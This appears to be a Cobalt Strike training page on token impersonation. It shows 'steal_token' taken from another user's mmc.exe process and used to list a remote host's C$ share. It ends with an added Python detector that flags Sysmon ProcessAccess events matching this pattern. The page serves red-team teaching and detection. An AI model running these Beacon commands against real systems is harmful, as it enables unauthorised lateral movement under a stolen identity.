Token Impersonation

We have already seen an example of using Cobalt Strike's steal_token command in the context of pass the ticket. However, if we elevate on, or land on, a system where another user is running a process, we can impersonate that process's token without having to jump through additional hoops.

If we list the running processes on Workstation 2 from an elevated prompt, we see that jking is running an instance of mmc.exe.

 PID   PPID  Name                                   Arch  Session     User
 ---   ----  ----                                   ----  -------     ----
 5536  1020  mmc.exe                                x64   0           DEV\jking

We can simply steal its token and access a target.

beacon> steal_token 5536

beacon> ls \\web.dev.cyberbotic.io\c$
[*] Listing: \\web.dev.cyberbotic.io\c$\

 Size     Type    Last Modified         Name
 ----     ----    -------------         ----
          dir     08/15/2022 18:50:13   $Recycle.Bin
          dir     08/10/2022 04:55:17   $WinREAgent
          dir     08/10/2022 05:05:53   Boot
          dir     08/18/2021 23:34:55   Documents and Settings
          dir     08/19/2021 06:24:49   EFI
          dir     08/15/2022 18:58:09   inetpub
          dir     05/08/2021 08:20:24   PerfLogs
          dir     08/24/2022 11:02:25   Program Files
          dir     08/10/2022 04:06:16   Program Files (x86)
          dir     08/31/2022 17:40:32   ProgramData
          dir     08/15/2022 18:31:08   Recovery
          dir     08/30/2022 11:16:24   System Volume Information
          dir     08/30/2022 17:51:08   Users
          dir     08/30/2022 20:19:27   Windows
 427kb    fil     08/10/2022 05:00:07   bootmgr
 1b       fil     05/08/2021 08:14:33   BOOTNXT
 12kb     fil     09/01/2022 07:26:41   DumpStack.log.tmp
 384mb    fil     09/01/2022 07:26:41   pagefile.sys

This technique works by obtaining a handle to the target process, opening and duplicating its primary access token, and then impersonating that token. The downside is that if the user closes the process, our ability to abuse it goes away. By taking the additional steps of extracting tickets or hashes, we provide ourselves a more guaranteed or "future-proof" way of leveraging the credential material.

When impersonating users in this way, the CS client (since 4.8) updates several UI elements to help you keep track of who (if anybody) your Beacon is currently impersonating.
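The sequence described above (open a handle to the process, open and duplicate its primary token, impersonate it) leaves a host-side footprint that a defender can look for: the OpenProcess call needs at least PROCESS_QUERY_LIMITED_INFORMATION on the target, and it typically crosses a user boundary, since the point is to pick up a token that belongs to someone else. The following Python is an added example that is not part of the original page or of Cobalt Strike; it scores Sysmon Event ID 10 (ProcessAccess) records against those two properties plus a small allowlist of system processes. The record layout (SourceUser/TargetUser fields as emitted by recent Sysmon versions) and the sample events, including the 0x1400 access mask and the temp-directory source image, are constructed for the example, not taken from a real capture.

```python
"""Flag Sysmon Event ID 10 (ProcessAccess) records consistent with token theft.

Added example, not from the original page. Assumes Sysmon-style records that
carry SourceUser/TargetUser; all sample records below are constructed.
"""

# Process access rights from winnt.h. OpenProcessToken needs at least
# PROCESS_QUERY_LIMITED_INFORMATION on the process handle, so that bit (or the
# broader PROCESS_QUERY_INFORMATION) is the minimum a token-stealing OpenProcess
# call requests.
PROCESS_ACCESS_RIGHTS = {
    0x0001: "PROCESS_TERMINATE",
    0x0002: "PROCESS_CREATE_THREAD",
    0x0008: "PROCESS_VM_OPERATION",
    0x0010: "PROCESS_VM_READ",
    0x0020: "PROCESS_VM_WRITE",
    0x0040: "PROCESS_DUP_HANDLE",
    0x0080: "PROCESS_CREATE_PROCESS",
    0x0100: "PROCESS_SET_QUOTA",
    0x0200: "PROCESS_SET_INFORMATION",
    0x0400: "PROCESS_QUERY_INFORMATION",
    0x0800: "PROCESS_SUSPEND_RESUME",
    0x1000: "PROCESS_QUERY_LIMITED_INFORMATION",
}
TOKEN_OPEN_RIGHTS = 0x0400 | 0x1000

# System components that routinely open handles to other users' processes.
# Starting point only (assumption); tune against the environment's baseline.
BENIGN_SOURCES = {
    "c:\\windows\\system32\\svchost.exe",
    "c:\\windows\\system32\\csrss.exe",
    "c:\\windows\\system32\\lsass.exe",
    "c:\\windows\\system32\\taskmgr.exe",
    "c:\\windows\\system32\\wininit.exe",
}


def decode_access(mask: int) -> list[str]:
    """Expand a GrantedAccess mask into the named rights it contains."""
    return [name for bit, name in sorted(PROCESS_ACCESS_RIGHTS.items()) if mask & bit]


def is_token_theft_candidate(event: dict) -> bool:
    """True when the access pattern matches the page's impersonation flow."""
    mask = int(event["GrantedAccess"], 16)
    if not mask & TOKEN_OPEN_RIGHTS:
        return False  # cannot call OpenProcessToken on this handle
    if event["SourceUser"].lower() == event["TargetUser"].lower():
        return False  # same-user access: nothing new to impersonate
    if event["SourceImage"].lower() in BENIGN_SOURCES:
        return False  # expected cross-user access by system components
    return True


def token_theft_candidates(events: list[dict]) -> list[dict]:
    """Return flagged events, each annotated with the decoded access rights."""
    return [
        {**e, "DecodedAccess": decode_access(int(e["GrantedAccess"], 16))}
        for e in events
        if is_token_theft_candidate(e)
    ]


# Constructed sample records (not real telemetry). Event 0 mirrors the page's
# scenario: an elevated (SYSTEM) process opening jking's mmc.exe.
SAMPLE_EVENTS = [
    {"SourceImage": "C:\\Users\\Public\\update.exe",
     "SourceUser": "NT AUTHORITY\\SYSTEM",
     "TargetImage": "C:\\Windows\\System32\\mmc.exe",
     "TargetUser": "DEV\\jking",
     "GrantedAccess": "0x1400"},
    {"SourceImage": "C:\\Windows\\System32\\svchost.exe",
     "SourceUser": "NT AUTHORITY\\SYSTEM",
     "TargetImage": "C:\\Windows\\System32\\mmc.exe",
     "TargetUser": "DEV\\jking",
     "GrantedAccess": "0x1000"},
    {"SourceImage": "C:\\Program Files\\Debugger\\dbg.exe",
     "SourceUser": "DEV\\jking",
     "TargetImage": "C:\\Windows\\System32\\mmc.exe",
     "TargetUser": "DEV\\jking",
     "GrantedAccess": "0x1FFFFF"},
    {"SourceImage": "C:\\Users\\Public\\update.exe",
     "SourceUser": "NT AUTHORITY\\SYSTEM",
     "TargetImage": "C:\\Windows\\System32\\mmc.exe",
     "TargetUser": "DEV\\jking",
     "GrantedAccess": "0x0010"},
]

if __name__ == "__main__":
    for hit in token_theft_candidates(SAMPLE_EVENTS):
        print(f"{hit['SourceImage']} ({hit['SourceUser']}) -> "
              f"{hit['TargetImage']} ({hit['TargetUser']}): "
              f"{', '.join(hit['DecodedAccess'])}")
```

Only the first sample is flagged: the svchost record is allowlisted, the debugger record stays within one user, and the last record requests only PROCESS_VM_READ, which is not enough to open the token. Note the other side of the picture: on the remote host (web in the example above) the share listing appears simply as a network logon for jking from Workstation 2, so the ProcessAccess event on the source host is what ties the activity back to the impersonating process.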
